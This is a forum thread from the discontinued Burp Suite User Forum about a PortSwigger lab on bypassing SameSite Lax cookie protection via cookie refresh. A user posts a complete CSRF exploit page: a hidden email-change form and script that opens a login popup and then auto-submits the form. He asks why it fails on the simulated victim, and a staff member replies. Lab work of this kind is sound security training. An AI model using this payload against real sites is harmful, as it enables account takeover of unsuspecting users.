The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab: SameSite Lax bypass via cookie refresh - Question regarding victim behavior.

Jacek | Last updated: Aug 03, 2023 02:06PM UTC

Hi Team,

Are there any specific limitations on victim behavior, like a timeout or the number of URLs that the client enters? I tested the exploit on myself and it works. I'm not sure why it's not working on the victim.

------------------
<p>Click anywhere on the page</p>
<form action="https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account/change-email" method="POST">
    <input type="hidden" name="email" value="pwnd@o2.pl" />
</form>
<script>
    window.onclick = () => {
        hack();
    };
    hack = function(){
        var popup = window.open('https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/logout');
        setTimeout(function(){popup.location.href = 'https://0a71002104c46b1780c1e9e6001e00e4.web-security-academy.net/my-account';}, 1000);
        setTimeout(function(){history.pushState('', '', '/');document.forms[0].submit();}, 6000);
    };
</script>
--------------------

Changing the actions to:
1. logout
2. social-login
3. submit form
also didn't work. I'm wondering if it's my mistake or the victim's limitation.

Thanks, J

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 07:13AM UTC

Hi Jacek, Have you changed the email address that is being used in your exploit between testing it on yourself and then delivering it to the victim user?

Jacek | Last updated: Aug 04, 2023 08:27AM UTC

Hi Ben,

Yes, I did. I try to modify the email address with every attempt. The only thing that worked was changing the actions to:
1. social-login
2. submit form

Thanks, Jacek

Ben, PortSwigger Agent | Last updated: Aug 04, 2023 03:37PM UTC